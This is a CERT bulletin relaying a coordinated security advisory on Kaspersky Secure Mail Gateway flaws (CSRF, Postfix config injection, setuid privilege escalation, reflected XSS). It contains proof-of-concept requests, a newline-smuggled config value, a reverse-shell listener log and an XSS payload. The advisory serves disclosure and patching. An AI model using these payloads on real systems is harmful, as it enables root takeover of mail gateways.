Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2018.0404 Kaspersky Secure Mail Gateway Multiple Vulnerabilities 9 February 2018 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Kaspersky Secure Mail Gateway Publisher: Kaspersky Operating System: Network Appliance Impact/Access: Root Compromise -- Existing Account Cross-site Request Forgery -- Remote with User Interaction Cross-site Scripting -- Remote with User Interaction Resolution: Patch/Upgrade CVE Names: CVE-2018-6291 CVE-2018-6290 CVE-2018-6289 CVE-2018-6288 Original Bulletin: https://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities - --------------------------BEGIN INCLUDED TEXT-------------------- Kaspersky Secure Mail Gateway Multiple Vulnerabilities 1. Advisory Information Title: Kaspersky Secure Mail Gateway Multiple Vulnerabilities Advisory ID: CORE-2017-0010 Advisory URL: http://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities Date published: 2018-02-01 Date of last update: 2018-02-01 Vendors contacted: Kaspersky Lab Release mode: Coordinated release 2. Vulnerability Information Class: Cross-Site Request Forgery [CWE-352], Improper Neutralization of Special Elements in Output Used by a Downstream Component [CWE-74], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-6288, CVE-2018-6289, CVE-2018-6290, CVE-2018-6291 3. Vulnerability Description - From Kaspersky Labs website: Kaspersky Secure Mail Gateway [1] gives you a fully integrated email system; mail security solution - including anti-spam, anti-malware, anti-phishing and more - in a single virtual appliance. It's easy to install and manage - so you save time on day-to-day mail and mail security tasks, while we deliver award-winning security that helps you keep your business safe and boost user productivity. Multiple vulnerabilities were found in the Kaspersky Mail Gateway Web Management Console. It is possible for a remote attacker to abuse these vulnerabilities and gain command execution as root. 4. Vulnerable Packages Kaspersky Secure Mail Gateway 1.1.0.379 Other products and versions might be affected, but they were not tested. 5. Vendor Information, Solutions and Workarounds Kaspersky Labs published the following advisory https://support.kaspersky.com/vulnerability.aspx?el=12430#010218 6. Credits These vulnerabilities were discovered and researched by Leandro Barragan from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. 7. Technical Description / Proof of Concept Code Kaspersky Secure Mail Gateway is a virtual appliance designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to monitor the application status and manage its operation. This Management Console provides no cross-site request forgery protection site-wide, which could result in administrative account takeover as shown in 7.1. In addition, an attacker who manages to get access to the Web Console could gain command execution as root (7.2) by injecting arbitrary content into the appliance's Postfix configuration. It is also possible to elevate privileges from kluser to root (7.3) by abusing a setuid binary shipped with the appliance, which executes a script located on an attacker-controlled location with root privileges. Apart from this, a reflected cross-site scripting vulnerability (7.4) was found which affects the Management Console. 7.1. Cross-site Request Forgery leading to Administrative account takeover [CVE-2018-6288] There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The "Import Application Settings" feature is particularly interesting because it allows users to restore a backup file that overwrites the appliance's configuration. A settings backup file contains five zlib segments: $ binwalk KSMG_settings.kz DECIMAL HEXADECIMAL DESCRIPTION - -------------------------------------------------------------------------------- 16 0x10 Zlib compressed data, default compression 39 0x27 Zlib compressed data, default compression 2242 0x8C2 Zlib compressed data, default compression 2268 0x8DC Zlib compressed data, default compression 3072 0xC00 Zlib compressed data, default compression The last segment is a compressed backup of /var/opt/kaspersky/klms/db/passwd, which contains a list of usernames, passwords, and profiles, for example: # cat /var/opt/kaspersky/klms/db/passwd Administrator:7{E{I'}Ap{RpY~t/V28\lZ&,FM&97s5`6f5e51bd7ade638785f5e7476351839e:admin An attacker can craft a backup file that contains its own passwd file, and then submit it by abusing the CSRF vulnerability. The appliance then overwrites the original passwd file giving the attacker access to Administrator account. The following proof-of-concept request restores only account information in order to avoid changing appliance's current configuration. Please note that the file contents were removed to make it more readable. POST /ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5 HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------3463969741915053213976213766 Content-Length: 3935 Referer: https://server/ksmg/ Cookie: SID=7362ED7771E7213F0EFCE85B430E240D Connection: close Upgrade-Insecure-Requests: 1 - -----------------------------3463969741915053213976213766 Content-Disposition: form-data; name="data" {"importSections":{"importWebPasswords":true,"importMachineIndependent":false,"importMachineDependent":false,"machineDependent":{"importTraces":false,"importProxy":false,"importAuth":false,"importBackup":false,"backupImportSection":{"importFileStorage":false},"importScan":false,"scanImportSection":{"importFilterSocket":false},"importUpdater":false,"importQuarantine":false},"importRules":false,"importPersonal":false}} - -----------------------------3463969741915053213976213766 Content-Disposition: form-data; name="fileContent"; filename="KSMG_settings.kz" Content-Type: application/octet-stream [...Tampered configuration file...] - -----------------------------3463969741915053213976213766-- 7.2. Configuration file injection leading to Code Execution as Root [CVE-2018-6289] Using the Web Management Console it is possible to add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix main.cf configuration file. By adding LF characters to this parameter, it is possible to inject a configuration parameter that would allow an attacker to execute arbitrary commands on the appliance as root. The following request injects arbitrary configuration settings into /etc/postfix/main.cf: POST /ksmg/cgi-bin/klwi?action=setMtaSettings HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: https://server/ksmg/ Content-Length: 1541 Cookie: SID=7362ED7771E7213F0EFCE85B430E240D Connection: close data={"alwaysBcc":"test@test.com\nmulti_instance_enable=yes\nmulti_instance_wrapper=\/tmp\/klms-appliance-upgrade\/upgrade.py\nmulti_instance_directories=\/tmp","mydomain":"localdomain",[...SNIPPED...] The resulting file looks as follows: $ cat /etc/postfix/main.cf ... always_bcc = test@test.com multi_instance_enable=yes multi_instance_wrapper=/tmp/klms-appliance-upgrade/upgrade.py multi_instance_directories=/tmp ... After that request is sent, postfix is automatically restarted, and the file pointed by multi_instance_wrapper is executed. In this proof-of-concept that parameter points to a python reverse shell: $ nc -lvvvp 1080 Listening on [0.0.0.0] (family 0, port 1080) Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport 42776) sh: no job control in this shell sh-4.1# id id uid=0(root) gid=497(klusers) groups=497(klusers),90(postdrop) Please note that while abusing this behavior would allow attackers to execute any binary on the system, no arguments can be passed to it. In order to overcome this we abused another Web Console functionality to upload a python script to the file system. That procedure is described next. An attacker can write to /tmp/klms-appliance-upgrade/ using the Web Console using System Upgrade functionality. This feature takes an upgrade file (i.e. a KTGZ file), decodes it, and unpacks it on /tmp/klms-appliance-upgrade/. KTGZ files can be crafted by creating a TAR.GZ file with a malicious upgrade.py file inside it, and then XORing it with key 0xDF23B1ED. This key is static and hardcoded on system's binaries. When this file is uploaded using the Web Console, the upgrade process will fail, as it lacks Kaspersky signature files. However, the content of the rogue upgrade file (including the modified upgrade.py file used on this proof-of-concept) will remain on /tmp/klms-appliance-upgrade/. It is worth noting that file's permissions are conserved, so we can upload files with the executable bit set. 7.3. Local Privilege Escalation [CVE-2018-6290] There is a setuid root binary located on /opt/kaspersky/klms-appliance/libexec/upgrade/: $ ls -lha /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher - -rws--x--- 1 root klusers 7,6K sep 24 2015 /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher This program looks for a python script once executed: $ /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher /usr/bin/python: can't open file '/tmp/klms-appliance-upgrade/upgrade.py': [Errno 2] No such file or directory /tmp/klms-appliance-upgrade/ directory is writeable by kluser by default. If an attacker manages to run commands on the appliance as kluser, s/he could abuse this behavior to elevate privileges to root by writing a malicious script on the aforementioned path and running upgrade_launcher binary. 7.4. Reflected Cross-Site Scripting [CVE-2018-6291] The callback parameter of the importSettings action method is vulnerable to cross-site scripting. https://server/ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5...(1)</script><script> 8. Report Timeline 2017-09-26: Core Security sent an initial notification to Kaspersky, including a draft advisory. 2017-09-27: Kaspersky answered saying there was nothing in attachment and requested the possibility of sending draft advisory as a password protected archive. 2017-09-29: Kaspersky asked again for the draft advisory. 2017-09-29: Core Security answered saying password protected archive is not possible and sent the advisory in text form (inside the mail). 2017-10-04: Kaspersky acknowledged the reception of the advisory and confirmed the vulnerabilities in the product. They said issues will be fixed 'till the end of November'. 2017-11-13: Kaspersky informed they had to postpone the release of the patch and won't make it to the end of November as originally proposed. They are asking to postpone the release to February 1st, 2018 2017-11-13: Core Security answered acknowledging February 1st 2018 as the target publication date of the advisory and fix for the reported issues. 2018-01-16: Core Security asked final confirmation for February 1st as the target publication date and also the CVE-IDs for each one of the vulnerabilities found. 2018-01-18: Kaspersky confirmed February 1st as publication date. 2018-01-26: Core Security informed our advisory will be published February 1st at 12pm EST. 2018-01-30: Kaspersky informed they are waiting CVE-IDs from MITRE and that process might take a week long. Proposed postponing publication to February 8th. 2018-01-30: Core Security stated that postponing publication would not be possible and that the advisory will be published with pending CVE-IDs for each one of the vulnerabilities found until Kaspersky provides the final IDs. Also asked for a link to the fix to be included in the final advisory. 2018-01-30: Kaspersky sent the link for downloading latest KSMG version. 2018-01-30: Core Security acknowledged the information received. 2018-02-01: Advisory CORE-2017-0010 published. 9. References [1] https://www.kaspersky.com/small-to-medium-business-security/mail-security-appliance 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. Disclaimer The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBWnzozox+lLeg9Ub1AQg0vA//UWqI2M6H7he1qkb/5EroHKfd7mHxyFP4 vOovL2pj6ppiMgu02xPzBoX10L7mQxPbgBeCt1rrKat6dTUgXGRPseDkLudNniT8 itwjDVWaBATiWWMuz5IJjYuv0lQSxtEIGUVYkwE8nInxOiF+mIK4xR/ZRkiTux57 fj7+FEMilTOZzo0Xcx/5Q5X0sd4s0dcBP9g5UnHfcYOnPZqJ211IQ3ed2NieEwgk SegUfOanrkESQcGA2dPjjoQfHdCvaBq+unObRLviRYPWRtvksXS7VTYg4PYHDJ/1 lKYCTvofNMhTuQ1Sa4JHJpnJaPxsIkMtm1h5QaagyBpk/QLT+UvMkYEmiR5DXTzC Mf1n5u+RGIYhFuFjqxZ7m72aNdPCj0paD5SEi/kGB2deHy1XC51oGFNMPYxbRboM 2rjWuOqJfPyuq0xeFA+MdIFi1xYKIVYw0kKPmPjVdlnocJ+kAlXrkYBV3Ocgzsy0 2E5Ry8ZvvVjfukp9RdvaN/xx3KOexITU0W2YPg47bu4TgPPQRG73rf9SXReB2oLm 85+OqtsFhwLbTXNDfq56Z+v0yxW98SMQVWzF/PdKNPPHYSc1N6DT1t6pbzKrEd5E RdPRMl2x3X/qozdSvrv7o5jM81eICkcNI6yGUUsbyCBezKJSfpF24htJC0MpEM6n s/9O+sR5DS8= =uY6L -----END PGP SIGNATURE-----